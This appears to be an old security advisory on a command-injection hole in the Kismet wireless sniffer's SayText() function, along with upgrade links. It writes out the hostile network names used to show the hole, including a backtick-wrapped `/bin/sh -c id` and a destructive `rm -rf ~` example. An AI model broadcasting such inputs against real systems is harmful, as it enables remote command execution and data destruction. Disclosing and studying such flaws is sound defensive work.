|
COMMAND Kismet wireless sniffer local and remote vulnerabilities SYSTEMS AFFECTED Versions prior to 2.2.2 PROBLEM KF [http://www.snosoft.com] found following: I have discovered 2 potentially exploitable holes in the wireless sniffer package Kismet. Both issues have been addressed by the author. I am in the process of determining if the local command line overflow is exploitable or not. The other issue may be dependant on if your OS will allow you to specify an essid containing a backtick or a pipe char. http://www.kismetwireless.net/CHANGELOG May 28 2002 2.2.2 !! 2.2.2 released - fixes potentially exploitable remote hole in Festival saytext. !! May 27 2002 2.2.1 !! 2.2.1 released - potentially exploitable local root hole fixed !! Possible remote code execution via SayText() function of Kismet wireless sniffer If your OS allows essids to contain ` or | and it allows you to broadcast them... then this could be used to help abuse someones wireless sniffer. Kismet does the following // Fork and run a system call to play a sound void SayText(string player, string text) { char snd_call[1024]; snprintf(snd_call, 1024, \"echo \'(SayText \\\"%s\\\")\' | %s &\", text.c_str(), player.c_str()); if (system(snd_call) < 0) { ... so if my network name is `/bin/sh -c rm -rf ~` then thats a problem This function is called in 2 places.... ./kismet_server.cc: snprintf(snd_call, 1024, \"echo \'(SayText \\\"%s\\\")\' | %s &\", text.c_str(), ./kismet_server.cc: SayText(festival, text); ./kismet_curses.cc:void SayText(string player, string text) { ./kismet_curses.cc: snprintf(snd_call, 1024, \"echo \'(SayText \\\"%s\\\")\' | %s >/dev/null 2>/dev/null &\", text.c_str(), ./kismet_curses.cc: SayText(festival, text); My linux box appears to be able to supply an essid with a backtick [root@localhost <mailto:root@localhost> root]# iwconfig eth0 essid \"\\`/bin/sh -c id\\`\" [root@localhost <mailto:root@localhost> root]# iwconfig eth0 eth0 IEEE 802.11-DS ESSID:\"`/bin/sh -c id`\" Nickname:\"Prism I\" Mode:Managed Frequency:42.9497GHz Access Point: 44:44:44:44:44:44 Bit Rate:2Mb/s Tx-Power=15 dBm Sensitivity:1/3 Retry min limit:8 RTS thr:off Fragment thr:off Encryption key:off Power Management:off This is to proove the theory... I think since iwconfig lets it happen above this is a valid test. My apple base station would NOT allow ` or | in its network name so this is all I can do to test this theory. in kismet_server.c make the following change. snprintf(text, 100, \"New %s network \'%s\' detected.\", (info.wep ? \"En-crypted\" : \"Un-en-crypted\"), //info.ssid); \"`/bin/sh -c id`\"); upon firing up the server I was greeted by festival in a british accent saying \"U I D equals zero G I D equals zero ...\" once I dectected a valid network. again this would require you to create a valid packet with the info.ssid set to your command enclosed in backticks. Above I forced this data... This could be a nice form of reverse warfare for \"Wardrivers\" using kismet. have fun SOLUTION Use latest version. http://www.kismetwireless.net/code/kismet-2.2.2.tar.gz http://www.kismetwireless.net/code/kismet-2.2.2.diff